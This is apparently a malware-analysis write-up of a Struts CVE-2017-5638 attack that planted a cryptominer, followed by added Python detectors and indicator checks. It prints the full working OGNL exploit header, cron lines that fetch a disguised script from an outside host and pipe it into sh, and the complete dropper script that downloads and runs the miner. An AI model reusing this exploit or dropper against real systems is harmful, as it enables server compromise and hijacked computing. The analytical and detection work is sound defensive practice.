One day, we noticed a strange GET request towards our JBoss server:
GET /login.action HTTP/1.1
Host: X.X.X.X
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0
Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@org.apache.commons.io[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
From the request above, you'll quickly notice that this attack leverages the Apache Struts vulnerability CVE-2017-5638: the Content-Type header carries an OGNL expression instead of a media type, and Struts evaluates it.
The request tried to execute the command below:
#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'
Some explanations of the wget flags:
"-O": writes the documents to a file.
"-": if "-" is used as the file name, the documents are printed to standard output (disabling link conversion).
"-q": quiet (no output).
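As an added example (not part of the original write-up), the following Python detector turns the observation above into a check that can be run over captured requests: a legitimate Content-Type is a media type, so a value that opens with an OGNL expression is the signature of this attack, and the `#cmd=` assignment plus any URLs inside it can be pulled out as indicators. The two sample requests are constructed for the example; the first only mimics the shape of the request above and is not a complete payload.

```python
import re
from urllib.parse import urlparse

# Constructed sample requests (not from the original capture). The first has
# the shape of the CVE-2017-5638 request above: an OGNL expression in the
# Content-Type header; the second is a benign multipart upload.
SAMPLE_REQUESTS = [
    "GET /login.action HTTP/1.1\r\n"
    "Host: 10.0.0.5\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='echo \"48 * * * * "
    "wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\" | crontab -')"
    ".(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}\r\n"
    "\r\n",
    "POST /upload HTTP/1.1\r\n"
    "Host: 10.0.0.5\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4\r\n"
    "\r\n",
]

# A legitimate Content-Type is a media type such as "multipart/form-data;
# boundary=...". Struts evaluates %{...} and ${...} as OGNL, so either opener
# at the start of the value is the signature of this attack.
OGNL_OPENER = re.compile(r"^\s*[%$]\{")
CMD_ASSIGNMENT = re.compile(r"#cmd\s*=\s*'((?:[^'\\]|\\.)*)'")
URL_IN_PAYLOAD = re.compile(r"https?://[^\s'\"|)]+")


def parse_headers(raw_request):
    """Return {lower-cased name: value} for the header block of one request."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:   # [0] is the request line
        if line == "":
            break                                 # blank line ends the headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw_request):
    """Flag an OGNL Content-Type and pull out the command and URLs it carries."""
    headers = parse_headers(raw_request)
    ctype = headers.get("content-type", "")
    finding = {"suspicious": False, "command": None, "urls": [], "hosts": []}
    if not OGNL_OPENER.search(ctype):
        return finding
    finding["suspicious"] = True
    match = CMD_ASSIGNMENT.search(ctype)
    if match:
        finding["command"] = match.group(1)
    finding["urls"] = URL_IN_PAYLOAD.findall(ctype)
    finding["hosts"] = sorted({urlparse(u).hostname for u in finding["urls"]})
    return finding


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(inspect_request(raw))
```

The check keys on the opener rather than on specific class names, so it still fires when the payload is reordered or obfuscated; the extracted hosts and URLs are what you feed to egress blocking and to the crontab hunt on the affected server.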
As you see, it tried to fetch a .jpg file from 91.230.47.41 and pipe it straight into sh. Seems normal, right?
Let's fetch that file and take a look inside it:
user@host:~/a# file logo.jpg
logo.jpg: POSIX shell script, ASCII text executable
ASCII?? Not JPG?? hmm..
Let's see what's inside the "logo.jpg" file:
user@host:~/a# cat logo.jpg
#!/bin/sh
rm -rf /tmp/systemd-logind
rm -rf /tmp/logind.conf
rm -rf /tmp/kworker
rm -rf /tmp/kworker.conf
rm -rf /tmp/kauditd.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f qivtpwwuxs
ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
ps -fe|grep smzgmilpdo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/smzgmilpdo.conf
rm -rf /tmp/smzgmilpdo.conf
curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
We noticed that several other files are fetched; possibly a config file and a binary.
Let's fetch those files!
Here is the config file:
http://91.230.47.41/pics/kworker.conf
{
"url" : "stratum+tcp://212.129.44.157:80",
"url" : "stratum+tcp://212.129.46.87:80",
"url" : "stratum+tcp://212.129.44.156:80",
"url" : "stratum+tcp://212.129.46.191:80",
"url" : "stratum+tcp://62.210.29.108:80",
"url" : "stratum+tcp://212.83.129.195:80",
"url" : "stratum+tcp://212.129.44.155:80",
"user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
"pass" : "x",
"algo" : "cryptonight",
"quiet" : true
}
Not sure what it is. Maybe some sort of config file for cryptomining. Let's analyze the other two files.
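As an added example (not part of the original write-up), here is a small Python loader for the config above that extracts the indicators worth acting on: the pool endpoints and the wallet. It addresses one pitfall a practitioner hits immediately: the file repeats the "url" key seven times (the miner's pool fail-over list), and a default `json.loads` silently keeps only the last one, so six of the seven pools would never make it onto a block list. The copy of the config embedded below is the one shown above, including its doubled opening brace.

```python
import json
from urllib.parse import urlsplit

# Copy of the kworker.conf shown above, doubled opening brace included.
KWORKER_CONF = """{{
"url" : "stratum+tcp://212.129.44.157:80",
"url" : "stratum+tcp://212.129.46.87:80",
"url" : "stratum+tcp://212.129.44.156:80",
"url" : "stratum+tcp://212.129.46.191:80",
"url" : "stratum+tcp://62.210.29.108:80",
"url" : "stratum+tcp://212.83.129.195:80",
"url" : "stratum+tcp://212.129.44.155:80",
"user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
"pass" : "x",
"algo" : "cryptonight",
"quiet" : true
}"""


def _normalise(text):
    """Drop the stray brace: the captured file opens "{{" but closes "}"."""
    text = text.strip()
    if text.startswith("{{") and not text.endswith("}}"):
        text = text[1:]
    return text


def _keep_duplicates(pairs):
    """object_pairs_hook that keeps every value of a repeated key as a list."""
    merged = {}
    for key, value in pairs:
        merged.setdefault(key, []).append(value)
    return merged


def load_miner_config(text):
    """Parse the config so that all repeated "url" pools survive."""
    return json.loads(_normalise(text), object_pairs_hook=_keep_duplicates)


def naive_pool_urls(text):
    """What a plain json.loads gives you: only the last "url" is kept."""
    return [json.loads(_normalise(text))["url"]]


def extract_indicators(config):
    """Network and wallet indicators worth blocking or hunting for."""
    pools = []
    for url in config.get("url", []):
        parts = urlsplit(url)              # scheme "stratum+tcp" parses fine
        pools.append((parts.scheme, parts.hostname, parts.port))
    return {
        "pools": pools,
        "pool_endpoints": sorted({f"{host}:{port}" for _, host, port in pools}),
        "wallets": config.get("user", []),
        "algo": (config.get("algo") or [None])[0],
    }


if __name__ == "__main__":
    cfg = load_miner_config(KWORKER_CONF)
    print("naive parse sees:", naive_pool_urls(KWORKER_CONF))
    print("full parse sees:", extract_indicators(cfg))
```

The pools all listen on port 80, which is why a port-based egress rule alone would not have caught this traffic; blocking the seven host:port pairs, or inspecting for the stratum protocol on port 80, is the actionable outcome.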
First file: http://91.230.47.41/pics/kworker
user@host:~/91.230.47.41# file kworker
kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
hmm.. an executable Linux file..
Let's see if the file is packed:
user@host:~/91.230.47.41# upx -l kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
2979640 -> 1217152 40.85% linux/ElfAMD kworker
Yup. So let's unpack the file using UPX:
user@host:~/91.230.47.41# upx -d kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
2980813 <- 1217152 40.83% linux/ElfAMD kworker
Unpacked 1 file.
user@host:~/91.230.47.41# upx -l kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: kworker1: NotPackedException: not packed by UPX
Another file: http://91.230.47.41/pics/kworker_na
user@host:~/91.230.47.41# file kworker_na
kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped
user@host:~/91.230.47.41# upx -l kworker_na
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: kworker_na: NotPackedException: not packed by UPX
Overall, it looks like the attacker wants to compromise our servers and turn them into his own cryptocurrency mining machines.
Typical attack behavior we see at this time, when cryptocurrency prices are rising. People hack to make a profit.
Here are the MD5 hashes for the files above:
211e98ac0686fe98d06570ad0689e9b3 logo.jpg
d2a01b844521fb141b8449f4d8e1c821 kworker.conf
483b322b42835227d98f523f9df5c6fc kworker (upx packed)
4fa4269b7ce44bfce5ef574e6a37c38f kworker (upx unpacked)
131df88b7d0b3e7a1c4d84c37e71fb60 kworker_na
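As an added example (not part of the original write-up), the Python script below turns the dropper script and the hash list above into a host check: it looks for the two cron lines the payload installs, for a running process started the way the dropper starts the miner ("./kauditd -c smzgmilpdo.conf -t ..."), and for the dropped files in /tmp, hashing any it finds against the MD5 list. The crontab and `ps` samples are constructed so the checks can be exercised offline; the live run at the bottom reads the real crontab and process list.

```python
import hashlib
import os
import re
import subprocess

# Indicators lifted from the dropper script and the hash list above.
DROPPER_HOST = "91.230.47.41"
DROPPED_PATHS = ["/tmp/kauditd", "/tmp/smzgmilpdo.conf"]
KNOWN_MD5 = {
    "211e98ac0686fe98d06570ad0689e9b3": "logo.jpg",
    "d2a01b844521fb141b8449f4d8e1c821": "kworker.conf",
    "483b322b42835227d98f523f9df5c6fc": "kworker (upx packed)",
    "4fa4269b7ce44bfce5ef574e6a37c38f": "kworker (upx unpacked)",
    "131df88b7d0b3e7a1c4d84c37e71fb60": "kworker_na",
}
# The dropper starts the miner as "./kauditd -c smzgmilpdo.conf -t <threads>";
# it hunts rival miners by the strings "stratum" and "cryptonight", which are
# just as useful for finding this one.
MINER_CMDLINE = re.compile(r"kauditd -c smzgmilpdo\.conf|stratum|cryptonight")

# Constructed sample inputs so the checks run offline.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh
18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh
"""
SAMPLE_PS = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 225000 9000 ? Ss 10:00 0:01 /sbin/init
www-data 500 0.0 0.2 190000 8000 ? S 10:00 0:00 /usr/sbin/apache2 -k start
root 4242 99.0 0.5 300000 20000 ? Sl 10:05 5:12 ./kauditd -c smzgmilpdo.conf -t 2
"""


def check_crontab(crontab_text):
    """Cron lines that pull from the dropper host and pipe the result into sh."""
    return [line.strip() for line in crontab_text.splitlines()
            if DROPPER_HOST in line and re.search(r"\|\s*sh\b", line)]


def check_processes(ps_text):
    """(pid, command) pairs from `ps auxww` output that look like the miner."""
    hits = []
    for line in ps_text.splitlines()[1:]:        # skip the header row
        fields = line.split(None, 10)            # 11th field is the full command
        if len(fields) < 11:
            continue
        pid, command = fields[1], fields[10]
        if MINER_CMDLINE.search(command):
            hits.append((int(pid), command))
    return hits


def md5_digest(data):
    return hashlib.md5(data).hexdigest()


def check_files(paths=DROPPED_PATHS):
    """Hash any dropped file that exists and label it against the known set."""
    hits = []
    for path in paths:
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                digest = md5_digest(fh.read())
            hits.append((path, digest, KNOWN_MD5.get(digest, "unknown variant")))
    return hits


def _run(argv):
    """Run a command and return its stdout, or "" if it is missing or fails."""
    try:
        return subprocess.run(argv, capture_output=True, text=True).stdout
    except OSError:
        return ""


if __name__ == "__main__":
    # Live run on this host; all three lists are empty on a clean machine.
    print("cron:", check_crontab(_run(["crontab", "-l"])))
    print("procs:", check_processes(_run(["ps", "auxww"])))
    print("files:", check_files())
```

A file in /tmp whose hash is not in the list still gets reported, since the dropper re-downloads kworker.conf and the binary on every run and the attacker can swap either without touching the cron entries; the path and the command line are the stable indicators here, the hashes are the confirmation.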